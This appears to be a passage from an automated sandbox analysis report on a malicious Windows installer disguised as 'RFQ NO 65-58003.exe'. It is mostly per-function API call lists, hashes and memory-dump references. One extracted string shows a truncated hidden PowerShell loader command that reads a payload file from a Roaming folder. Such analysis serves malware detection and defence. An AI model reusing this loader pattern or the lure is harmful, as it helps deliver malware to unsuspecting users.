                                                              • CreateDirectoryW.KERNELBASE(?,00000000,0040343D,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403672), ref: 004058C3
                                                              • GetLastError.KERNEL32 ref: 004058D1
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2178922619.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2178883210.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178945773.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2179441194.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_RFQ NO 65-58003.jbxd
                                                              Similarity
                                                              • API ID: CreateDirectoryErrorLast
                                                              • String ID:
                                                              • API String ID: 1375471231-0
                                                              • Opcode ID: 90cc4c9737d43430731b600de694bcf2d45feac9894761d90dfe22e9228b7257
                                                              • Instruction ID: 9103f4137618f2f7179a3cd735c3beaeb677db9e9f97e60de6da32ac40298118
                                                              • Opcode Fuzzy Hash: 90cc4c9737d43430731b600de694bcf2d45feac9894761d90dfe22e9228b7257
                                                              • Instruction Fuzzy Hash: 42C04C31204A019BD6506B209F08B177A94EF50742F21C4396646F00A0DA348425DF3D
                                                              Function 0040230C Relevance: 1.5, APIs: 1, Instructions: 25COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • WritePrivateProfileStringW.KERNEL32(00000000,00000000,?,00000000), ref: 00402343
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2178922619.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2178883210.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178945773.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2179441194.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_RFQ NO 65-58003.jbxd
                                                              Similarity
                                                              • API ID: PrivateProfileStringWrite
                                                              • String ID:
                                                              • API String ID: 390214022-0
                                                              • Opcode ID: 196762a6526ae89b3abf44263c4053b82e560c8490a900e61fc9f6afa6b6512d
                                                              • Instruction ID: 442d6135041436e14d88d5d309934ead45877352a2168de0e76fd2d1165917bb
                                                              • Opcode Fuzzy Hash: 196762a6526ae89b3abf44263c4053b82e560c8490a900e61fc9f6afa6b6512d
                                                              • Instruction Fuzzy Hash: 3FE086319085B66BE71036F10F8DABF10589B44385B14057FB612B71C3D9FC4D8242AD
                                                              Function 00402D5D Relevance: 1.5, APIs: 1, Instructions: 22registryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • RegOpenKeyExW.KERNELBASE(00000000,?,00000000,00000022,00000000,?,?), ref: 00402D85
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2178922619.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2178883210.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178945773.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2179441194.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_RFQ NO 65-58003.jbxd
                                                              Similarity
                                                              • API ID: Open
                                                              • String ID:
                                                              • API String ID: 71445658-0
                                                              • Opcode ID: 2cb17219caef5c2c057f25c6a0d5a563c17eea178cedf0001938d6a474f7be63
                                                              • Instruction ID: 508f16f0b04c5eadc0d806ad76faca1178dd72643dd16b9b94500f6ee76514f5
                                                              • Opcode Fuzzy Hash: 2cb17219caef5c2c057f25c6a0d5a563c17eea178cedf0001938d6a474f7be63
                                                              • Instruction Fuzzy Hash: 12E04F76280108ABDB00EFA4EE46ED537DCAB14740F008021B608D70A1C674E5509768
                                                              Function 00405E6A Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • ReadFile.KERNELBASE(0040A230,00000000,00000000,00000000,00000000,00414ED0,0040CED0,004033FF,0040A230,0040A230,00403303,00414ED0,00004000,?,00000000,004031AD), ref: 00405E7E
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2178922619.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2178883210.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178945773.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2179441194.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_RFQ NO 65-58003.jbxd
                                                              Similarity
                                                              • API ID: FileRead
                                                              • String ID:
                                                              • API String ID: 2738559852-0
                                                              • Opcode ID: 367723d41a66009c2099c483b716accd4a6fea8915a9694eb2152ff5aa97eb4c
                                                              • Instruction ID: 5673304fef1064f236b213ef723108cd0aff19b739320a24e8caa41491261f20
                                                              • Opcode Fuzzy Hash: 367723d41a66009c2099c483b716accd4a6fea8915a9694eb2152ff5aa97eb4c
                                                              • Instruction Fuzzy Hash: 27E0B63661025ABBDF109F65DC00AAB7B6CFB05260F048436BA55E6190E635E9219AE4
                                                              Function 00405E99 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • WriteFile.KERNELBASE(0040A230,00000000,00000000,00000000,00000000,0040E71A,0040CED0,00403383,0040CED0,0040E71A,00414ED0,00004000,?,00000000,004031AD,00000004), ref: 00405EAD
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2178922619.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2178883210.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178945773.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2179441194.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_RFQ NO 65-58003.jbxd
                                                              Similarity
                                                              • API ID: FileWrite
                                                              • String ID:
                                                              • API String ID: 3934441357-0
                                                              • Opcode ID: 6919b523ba5b1b84b4b924eeaf28b73d4aab7fc63dbc8f700f0d9cb823d33c03
                                                              • Instruction ID: 98d10028cd881ca52753e47c7ca342dd4640a312c7922d7b1eeb81aac27e7924
                                                              • Opcode Fuzzy Hash: 6919b523ba5b1b84b4b924eeaf28b73d4aab7fc63dbc8f700f0d9cb823d33c03
                                                              • Instruction Fuzzy Hash: 41E0EC3226065AABDF109F55DC00EEB7F6CEB053A1F048836FD55E2190D631EA62DBE4
                                                              Function 00404322 Relevance: 1.5, APIs: 1, Instructions: 9windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • SendMessageW.USER32(?,00000000,00000000,00000000), ref: 00404334
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2178922619.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2178883210.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178945773.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2179441194.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_RFQ NO 65-58003.jbxd
                                                              Similarity
                                                              • API ID: MessageSend
                                                              • String ID:
                                                              • API String ID: 3850602802-0
                                                              • Opcode ID: c2a25a807fea80bd58a61b321fa2af33aa5b35e52655131f61520799e32131e4
                                                              • Instruction ID: 8a3813f545c22c4fb684de807d70b5cf20617c54f99984af9f55df869fa0abe2
                                                              • Opcode Fuzzy Hash: c2a25a807fea80bd58a61b321fa2af33aa5b35e52655131f61520799e32131e4
                                                              • Instruction Fuzzy Hash: B2C09B71740700BBDA20DF649D45F5777547764701F1488797741F60E0C674D410D62C
                                                              Function 00403402 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00403100,?), ref: 00403410
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2178922619.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2178883210.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178945773.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2179441194.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_RFQ NO 65-58003.jbxd
                                                              Similarity
                                                              • API ID: FilePointer
                                                              • String ID:
                                                              • API String ID: 973152223-0
                                                              • Opcode ID: 1c6da78d27ebc38603b4c87e6ff41e0916c1b34e9bb95e36f46a9ca6431a4e31
                                                              • Instruction ID: 64c0fffafe8abe290eaf2022e63b776f1a4a3bd25e2fde741040b5855636c72c
                                                              • Opcode Fuzzy Hash: 1c6da78d27ebc38603b4c87e6ff41e0916c1b34e9bb95e36f46a9ca6431a4e31
                                                              • Instruction Fuzzy Hash: 70B01231140300BFDA214F00DF09F057B21AB90700F10C034B344780F086711075EB0D
                                                              Function 0040430B Relevance: 1.5, APIs: 1, Instructions: 6windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • SendMessageW.USER32(00000028,?,00000001,00404137), ref: 00404319
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2178922619.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2178883210.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178945773.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2179441194.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_RFQ NO 65-58003.jbxd
                                                              Similarity
                                                              • API ID: MessageSend
                                                              • String ID:
                                                              • API String ID: 3850602802-0
                                                              • Opcode ID: 7bbf2f5232cd2574a5b007ccbcd78797cc8e3f4bb2dd07224d7ba7f17a9ad77c
                                                              • Instruction ID: 3e0bacd84e958153637e663f6e0df00a268db6e73930f78988907d41dcf2010e
                                                              • Opcode Fuzzy Hash: 7bbf2f5232cd2574a5b007ccbcd78797cc8e3f4bb2dd07224d7ba7f17a9ad77c
                                                              • Instruction Fuzzy Hash: 32B01235290A00FBDE214B00EE09F457E62F76C701F008478B340240F0CAB300B1DB19
                                                              Function 004042F8 Relevance: 1.5, APIs: 1, Instructions: 4COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • KiUserCallbackDispatcher.NTDLL(?,004040D0), ref: 00404302
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2178922619.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2178883210.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178945773.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2179441194.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_RFQ NO 65-58003.jbxd
                                                              Similarity
                                                              • API ID: CallbackDispatcherUser
                                                              • String ID:
                                                              • API String ID: 2492992576-0
                                                              • Opcode ID: 8a62e99fe4a67b047fdc914663d327e58adf51456459288db10dd5d3044e9a2e
                                                              • Instruction ID: ea629541fdd2228df96855dc4de4e407fdbb002a66502a1a5a86269346c048a7
                                                              • Opcode Fuzzy Hash: 8a62e99fe4a67b047fdc914663d327e58adf51456459288db10dd5d3044e9a2e
                                                              • Instruction Fuzzy Hash: C0A001B6644500ABCE129F90EF49D0ABBB2EBE8742B518579A285900348A364961EB59

                                                              Non-executed Functions

                                                              Function 00404CED Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 481windowmemoryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetDlgItem.USER32(?,000003F9), ref: 00404D05
                                                              • GetDlgItem.USER32(?,00000408), ref: 00404D10
                                                              • GlobalAlloc.KERNEL32(00000040,?), ref: 00404D5A
                                                              • LoadBitmapW.USER32(0000006E), ref: 00404D6D
                                                              • SetWindowLongW.USER32(?,000000FC,004052E5), ref: 00404D86
                                                              • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404D9A
                                                              • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404DAC
                                                              • SendMessageW.USER32(?,00001109,00000002), ref: 00404DC2
                                                              • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404DCE
                                                              • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404DE0
                                                              • DeleteObject.GDI32(00000000), ref: 00404DE3
                                                              • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404E0E
                                                              • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404E1A
                                                              • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404EB0
                                                              • SendMessageW.USER32(?,0000110A,00000003,00000000), ref: 00404EDB
                                                              • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404EEF
                                                              • GetWindowLongW.USER32(?,000000F0), ref: 00404F1E
                                                              • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404F2C
                                                              • ShowWindow.USER32(?,00000005), ref: 00404F3D
                                                              • SendMessageW.USER32(?,00000419,00000000,?), ref: 0040503A
                                                              • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 0040509F
                                                              • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 004050B4
                                                              • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 004050D8
                                                              • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 004050F8
                                                              • ImageList_Destroy.COMCTL32(?), ref: 0040510D
                                                              • GlobalFree.KERNEL32(?), ref: 0040511D
                                                              • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00405196
                                                              • SendMessageW.USER32(?,00001102,?,?), ref: 0040523F
                                                              • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 0040524E
                                                              • InvalidateRect.USER32(?,00000000,00000001), ref: 0040526E
                                                              • ShowWindow.USER32(?,00000000), ref: 004052BC
                                                              • GetDlgItem.USER32(?,000003FE), ref: 004052C7
                                                              • ShowWindow.USER32(00000000), ref: 004052CE
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2178922619.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2178883210.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178945773.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2179441194.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_RFQ NO 65-58003.jbxd
                                                              Similarity
                                                              • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                              • String ID: $M$N
                                                              • API String ID: 1638840714-813528018
                                                              • Opcode ID: a20ec76394ec9aa9d7ee758541d4fa6294dbf0a1b8cf6e8fb4ee4d3cfcbb4640
                                                              • Instruction ID: fabf201a6726aaeed1f236dd7cd6744ceb795820712aa309ba6ddf90c5850425
                                                              • Opcode Fuzzy Hash: a20ec76394ec9aa9d7ee758541d4fa6294dbf0a1b8cf6e8fb4ee4d3cfcbb4640
                                                              • Instruction Fuzzy Hash: A4027DB0A00209EFDF209F54CD85AAE7BB5FB44314F50817AE610BA2E0D7799E52DF58
                                                              Function 00404771 Relevance: 24.8, APIs: 10, Strings: 4, Instructions: 275stringCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetDlgItem.USER32(?,000003FB), ref: 004047C0
                                                              • SetWindowTextW.USER32(00000000,?), ref: 004047EA
                                                              • SHBrowseForFolderW.SHELL32(?), ref: 0040489B
                                                              • CoTaskMemFree.OLE32(00000000), ref: 004048A6
                                                              • lstrcmpiW.KERNEL32(004281E0,00423728,00000000,?,?), ref: 004048D8
                                                              • lstrcatW.KERNEL32(?,004281E0), ref: 004048E4
                                                              • SetDlgItemTextW.USER32(?,000003FB,?), ref: 004048F6
                                                                • Part of subcall function 0040593B: GetDlgItemTextW.USER32(?,?,00000400,0040492D), ref: 0040594E
                                                                • Part of subcall function 004064A6: CharNextW.USER32(?,*?|<>/":,00000000,00000000,76233420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\RFQ NO 65-58003.exe",00403425,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403672), ref: 00406509
                                                                • Part of subcall function 004064A6: CharNextW.USER32(?,?,?,00000000), ref: 00406518
                                                                • Part of subcall function 004064A6: CharNextW.USER32(?,00000000,76233420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\RFQ NO 65-58003.exe",00403425,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403672), ref: 0040651D
                                                                • Part of subcall function 004064A6: CharPrevW.USER32(?,?,76233420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\RFQ NO 65-58003.exe",00403425,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403672), ref: 00406530
                                                              • GetDiskFreeSpaceW.KERNEL32(004216F8,?,?,0000040F,?,004216F8,004216F8,?,00000001,004216F8,?,?,000003FB,?), ref: 004049B9
                                                              • MulDiv.KERNEL32(?,0000040F,00000400), ref: 004049D4
                                                                • Part of subcall function 00404B2D: lstrlenW.KERNEL32(00423728,00423728,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404BCE
                                                                • Part of subcall function 00404B2D: wsprintfW.USER32 ref: 00404BD7
                                                                • Part of subcall function 00404B2D: SetDlgItemTextW.USER32(?,00423728), ref: 00404BEA
                                                              Strings
                                                              • (7B, xrefs: 0040486E
                                                              • powershell.exe -windowstyle hidden "$Sonnetish=gc -raw 'C:\Users\user\AppData\Roaming\afdragsordning\Rygklapperne.Tis225';$Gas, xrefs: 0040478A
                                                              • C:\Users\user\AppData\Roaming\afdragsordning, xrefs: 004048C1
                                                              • A, xrefs: 00404894
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2178922619.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2178883210.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178945773.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2179441194.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
